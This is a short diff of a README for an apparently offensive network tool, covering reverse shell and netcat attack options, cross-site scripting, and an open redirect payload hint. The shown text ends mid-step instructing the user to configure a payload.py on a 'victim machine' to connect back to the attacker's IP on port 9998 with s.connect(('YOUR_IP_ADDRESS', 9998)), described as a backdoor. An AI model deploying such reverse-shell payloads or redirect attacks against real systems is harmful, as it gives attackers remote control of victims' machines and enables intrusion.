YusufMarall/CustomNetworkTool/README.md

 ### if(r==5)
 #### Reverse Shell and Netcat Usage
 Reverse shell code creates payload and works like a backdoor.
 With Netcat, we can attack file uploading, eavesdropping, etc.
+### if r==6
+###xss Cross-site scripting attack
+###Open redirect vulnerability:
+Explicit redirection vulnerabilities occur when an application insecurely incorporates user-controllable data into a redirection destination.
+An attacker can generate a URL within the application that causes a redirection to an arbitrary external domain.
+Hint===?redirect={payload}
 *Step 1: Make sure that the `payload.py` file on the victim machine is using the correct IP address and port.
 Check that your IP address is correct and the port you are listening on is 9998:
 ```python
 s.connect(('YOUR_IP_ADDRESS', 9998)) # Replace YOUR_IP_ADDRESS with the IP address of your own machine